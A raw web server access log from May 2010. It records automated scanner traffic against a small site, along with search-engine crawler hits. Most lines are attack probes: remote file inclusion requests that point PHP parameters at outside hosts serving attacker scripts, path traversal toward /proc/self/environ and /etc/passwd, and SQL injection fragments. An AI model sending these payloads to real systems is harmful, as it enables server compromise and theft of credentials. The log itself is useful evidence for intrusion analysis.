80.67.23.184 - - [20/May/2010:10:06:25 -0500] "GET /errors.php?error=http://www.thaismecity.com/thaismejob/include/idv6.txt??%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
121.190.102.21 - - [20/May/2010:10:06:54 -0500] "GET //webcalendar/tools/send_reminders.php?noSet=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:10:06:54 -0500] "GET /logs/access_log.1271548800//webcalendar/tools/send_reminders.php?noSet=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:10:06:54 -0500] "GET /logs//webcalendar/tools/send_reminders.php?noSet=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
194.79.28.66 - - [20/May/2010:10:07:38 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
194.79.28.66 - - [20/May/2010:10:09:26 -0500] "GET /logs/access_log.1273276800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
194.79.28.66 - - [20/May/2010:10:09:26 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
194.79.28.66 - - [20/May/2010:10:09:27 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.250.255.243 - - [20/May/2010:10:10:49 -0500] "GET /logs/access_log.1178496000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
213.92.118.159 - - [20/May/2010:10:12:44 -0500] "GET /logs/access_log.1268956800////?_SERVER[DOCUMENT_ROOT]=http://christenplein.com/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:10:12:44 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://christenplein.com/id1.txt? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:10:12:44 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://christenplein.com/id1.txt? HTTP/1.1" 200 6280 "-""Mozilla/5.0"
85.214.25.33 - - [20/May/2010:10:12:56 -0500] "GET /logs/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:10:12:56 -0500] "GET /rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.805"
216.245.220.19 - - [20/May/2010:10:14:10 -0500] "GET /error.php?dir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:10:14:10 -0500] "GET /logs/error.php?dir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:10:14:10 -0500] "GET /logs/access_log.1271548800/error.php?dir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:10:14:33 -0500] "GET /logs/error.php?dir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:10:14:33 -0500] "GET /logs/access_log.1271548800/error.php?dir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:10:14:33 -0500] "GET /error.php?dir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
124.0.74.195 - - [20/May/2010:10:14:36 -0500] "GET /logs/access_log.1271548800/send_reminders.php?includedir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
124.0.74.195 - - [20/May/2010:10:14:36 -0500] "GET /send_reminders.php?includedir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
124.0.74.195 - - [20/May/2010:10:14:36 -0500] "GET /logs/send_reminders.php?includedir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.115.111.115 - - [20/May/2010:10:14:45 -0500] "GET /logs/send_reminders.php?includedir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.115.111.115 - - [20/May/2010:10:14:45 -0500] "GET /logs/access_log.1271548800/send_reminders.php?includedir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.115.111.115 - - [20/May/2010:10:14:45 -0500] "GET /send_reminders.php?includedir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
208.43.122.86 - - [20/May/2010:10:16:01 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
208.43.122.86 - - [20/May/2010:10:16:01 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
87.250.255.243 - - [20/May/2010:10:16:37 -0500] "GET /logs/access_log.1197849600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.44 - - [20/May/2010:10:18:35 -0500] "GET /logs/access_log.1252800000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.179 - - [20/May/2010:10:19:31 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
125.248.150.84 - - [20/May/2010:10:19:57 -0500] "GET /solpot.html?body=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 295 "-""Mozilla/5.0"
125.248.150.84 - - [20/May/2010:10:19:57 -0500] "GET /logs/access_log.1272844800%20%20/solpot.html?body=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 324 "-""Mozilla/5.0"
125.248.150.84 - - [20/May/2010:10:19:57 -0500] "GET /logs/solpot.html?body=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 300 "-""Mozilla/5.0"
125.248.150.84 - - [20/May/2010:10:20:37 -0500] "GET /logs/access_log.1273104000%20%20/solpot.html?body=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 324 "-""Mozilla/5.0"
125.248.150.84 - - [20/May/2010:10:21:25 -0500] "GET /logs/access_log.1272844800/solpot.html?body=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:10:22:15 -0500] "GET /logs/access_log.1188086400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
125.248.150.84 - - [20/May/2010:10:22:51 -0500] "GET /logs/access_log.1266537600/solpot.html?body=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 322 "-""Mozilla/5.0"
125.248.150.84 - - [20/May/2010:10:22:51 -0500] "GET /logs/access_log.1265673600/solpot.html?body=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.252.3.123 - - [20/May/2010:10:25:02 -0500] "GET /logs/access_log.1265587200//include/admin.lib.inc.php?site_path=http://www.displaystandsuk.co.uk//Oid1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
87.252.3.123 - - [20/May/2010:10:25:02 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.displaystandsuk.co.uk//Oid1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
87.252.3.123 - - [20/May/2010:10:25:02 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.displaystandsuk.co.uk//Oid1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
69.175.8.98 - - [20/May/2010:10:25:58 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
69.175.8.98 - - [20/May/2010:10:25:58 -0500] "GET /logs/access_log.1271548800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
69.175.8.98 - - [20/May/2010:10:25:58 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
183.80.125.164 - - [20/May/2010:10:27:28 -0500] "GET /logs/access_log.1264982400+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
81.80.122.44 - - [20/May/2010:10:27:52 -0500] "GET /logs//errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
81.80.122.44 - - [20/May/2010:10:27:52 -0500] "GET //errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
183.80.125.164 - - [20/May/2010:10:27:54 -0500] "GET /logs/access_log.1263340800+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
87.250.255.243 - - [20/May/2010:10:28:04 -0500] "GET /logs/access_log.1211587200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.127.70.140 - - [20/May/2010:10:28:13 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:10:28:13 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:10:28:15 -0500] "GET /logs/access_log.1264982400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
183.80.125.164 - - [20/May/2010:10:28:25 -0500] "GET /logs/access_log.1266278400+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
69.175.8.98 - - [20/May/2010:10:28:51 -0500] "GET /logs/access_log.1273363200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
67.195.112.180 - - [20/May/2010:10:28:57 -0500] "GET /logs/access_log.1215907200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.80.122.44 - - [20/May/2010:10:28:58 -0500] "GET /logs/access_log.1262563200//info.dpim.go.th/cnt/user_stat.php?DDum=16&MDum=8&YDum=2009http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
81.80.122.44 - - [20/May/2010:10:28:59 -0500] "GET //info.dpim.go.th/cnt/user_stat.php?DDum=16&MDum=8&YDum=2009http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
81.80.122.44 - - [20/May/2010:10:28:59 -0500] "GET /logs//info.dpim.go.th/cnt/user_stat.php?DDum=16&MDum=8&YDum=2009http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
81.80.122.44 - - [20/May/2010:10:29:04 -0500] "GET //errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
81.80.122.44 - - [20/May/2010:10:29:57 -0500] "GET //errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
216.127.70.140 - - [20/May/2010:10:30:01 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:10:30:04 -0500] "GET /logs/access_log.1264982400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:10:30:04 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
81.80.122.44 - - [20/May/2010:10:30:48 -0500] "GET //errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
81.80.122.44 - - [20/May/2010:10:30:56 -0500] "GET //errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
69.175.8.98 - - [20/May/2010:10:30:59 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
69.175.8.98 - - [20/May/2010:10:30:59 -0500] "GET /logs/access_log.1271548800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
69.175.8.98 - - [20/May/2010:10:30:59 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.8.98 - - [20/May/2010:10:31:51 -0500] "GET /logs/access_log.1273363200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
81.80.122.44 - - [20/May/2010:10:31:59 -0500] "GET /logs/access_log.1265587200//errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
81.80.122.44 - - [20/May/2010:10:31:59 -0500] "GET //errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
81.80.122.44 - - [20/May/2010:10:31:59 -0500] "GET /logs//errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
81.80.122.44 - - [20/May/2010:10:33:04 -0500] "GET /logs/access_log.1265414400//info.dpim.go.th/cnt/user_stat.php?DDum=16&MDum=8&YDum=2009http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
216.127.70.140 - - [20/May/2010:10:33:11 -0500] "GET /logs/access_log.1265155200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
207.46.13.137 - - [20/May/2010:10:33:35 -0500] "GET /logs/access_log.1180137600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/May/2010:10:33:52 -0500] "GET /logs/access_log.1254268800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.127.70.140 - - [20/May/2010:10:35:46 -0500] "GET /logs/access_log.1265155200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:10:38:41 -0500] "GET /artwork/flagart.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
174.121.158.187 - - [20/May/2010:10:42:15 -0500] "GET /logs/access_log.1271548800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
174.121.158.187 - - [20/May/2010:10:42:15 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
174.121.158.187 - - [20/May/2010:10:42:15 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.214.25.33 - - [20/May/2010:10:42:51 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:10:42:54 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
216.18.201.130 - - [20/May/2010:10:43:16 -0500] "GET /logs/access_log.1264982400//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.18.201.130 - - [20/May/2010:10:43:16 -0500] "GET /logs//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 6278 "-""Mozilla/5.0"
216.18.201.130 - - [20/May/2010:10:43:16 -0500] "GET //?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
216.18.201.130 - - [20/May/2010:10:43:21 -0500] "GET /logs/access_log.1265414400//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.80.122.44 - - [20/May/2010:10:43:27 -0500] "GET /logs//errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
216.14.125.163 - - [20/May/2010:10:44:30 -0500] "GET /index.php?option=com_gcalendar&contoller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:10:44:32 -0500] "GET /index.php?option=com_gcalendar&contoller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:10:44:33 -0500] "GET /index.php?option=com_gcalendar&contoller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:10:44:37 -0500] "GET /index.php?option=com_gcalendar&contoller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:10:44:39 -0500] "GET /index.php?option=com_gcalendar&contoller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:10:44:40 -0500] "GET /index.php?option=com_gcalendar&contoller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
87.250.255.243 - - [20/May/2010:10:45:34 -0500] "GET /logs/access_log.1171065600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.91 - - [20/May/2010:10:46:05 -0500] "GET /logs/access_log.1201305600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.80.122.44 - - [20/May/2010:10:47:46 -0500] "GET /logs/access_log.1237420800//errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
81.80.122.44 - - [20/May/2010:10:47:47 -0500] "GET //errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
81.80.122.44 - - [20/May/2010:10:47:47 -0500] "GET /logs//errors.php?error=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
66.249.65.51 - - [20/May/2010:10:49:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.51 - - [20/May/2010:10:49:38 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.14.125.163 - - [20/May/2010:10:50:52 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&contoller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:10:50:52 -0500] "GET /index.php?option=com_gcalendar&contoller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:10:50:52 -0500] "GET /logs/index.php?option=com_gcalendar&contoller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
85.214.25.33 - - [20/May/2010:10:51:13 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:10:51:13 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:10:51:14 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6273 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:10:52:08 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:10:52:08 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:10:52:08 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6273 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:10:52:26 -0500] "GET /logs/access_log.1173830400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.43 - - [20/May/2010:10:52:35 -0500] "GET /logs/access_log.1266364800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
189.108.172.26 - - [20/May/2010:10:52:54 -0500] "GET /com_hsconfig../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 351 "-""libwww-perl/5.808"
189.108.172.26 - - [20/May/2010:10:52:58 -0500] "GET /logs/access_log.1273017600/com_hsconfig../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 378 "-""libwww-perl/5.808"
189.108.172.26 - - [20/May/2010:10:52:58 -0500] "GET /com_hsconfig../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 351 "-""libwww-perl/5.808"
189.108.172.26 - - [20/May/2010:10:52:59 -0500] "GET /logs/com_hsconfig../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 356 "-""libwww-perl/5.808"
189.108.172.26 - - [20/May/2010:10:53:47 -0500] "GET /logs/access_log.1273017600/com_hsconfig../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 378 "-""libwww-perl/5.808"
189.108.172.26 - - [20/May/2010:10:53:48 -0500] "GET /com_hsconfig../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 351 "-""libwww-perl/5.808"
189.108.172.26 - - [20/May/2010:10:53:48 -0500] "GET /logs/com_hsconfig../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 356 "-""libwww-perl/5.808"
189.108.172.26 - - [20/May/2010:10:54:12 -0500] "GET /com_hsconfig../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 351 "-""libwww-perl/5.808"
125.248.150.84 - - [20/May/2010:10:54:27 -0500] "GET /logs/access_log.1271548800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 346 "-""Mozilla/5.0"
125.248.150.84 - - [20/May/2010:10:54:27 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 319 "-""Mozilla/5.0"
125.248.150.84 - - [20/May/2010:10:54:27 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 324 "-""Mozilla/5.0"
189.108.172.26 - - [20/May/2010:10:56:19 -0500] "GET /logs/access_log.1273104000/com_hsconfig../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 378 "-""libwww-perl/5.808"
207.46.13.42 - - [20/May/2010:10:56:35 -0500] "GET /logs/access_log.1209340800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
189.108.172.26 - - [20/May/2010:10:56:40 -0500] "GET /logs/access_log.1273104000/com_hsconfig../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 378 "-""libwww-perl/5.808"
85.214.25.33 - - [20/May/2010:10:56:45 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:10:56:47 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:10:58:20 -0500] "GET /logs/access_log.1194825600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.191 - - [20/May/2010:10:58:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.191 - - [20/May/2010:10:58:35 -0500] "GET /logs/access_log.1198281600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.185.231.103 - - [20/May/2010:10:59:45 -0500] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
89.185.231.103 - - [20/May/2010:10:59:45 -0500] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
89.185.231.103 - - [20/May/2010:10:59:45 -0500] "GET /logs/access_log.1271548800//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.37.143.198 - - [20/May/2010:11:00:11 -0500] "GET /logs/access_log.1271548800//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
174.37.143.198 - - [20/May/2010:11:00:11 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
174.37.143.198 - - [20/May/2010:11:00:11 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
72.51.42.60 - - [20/May/2010:11:00:38 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
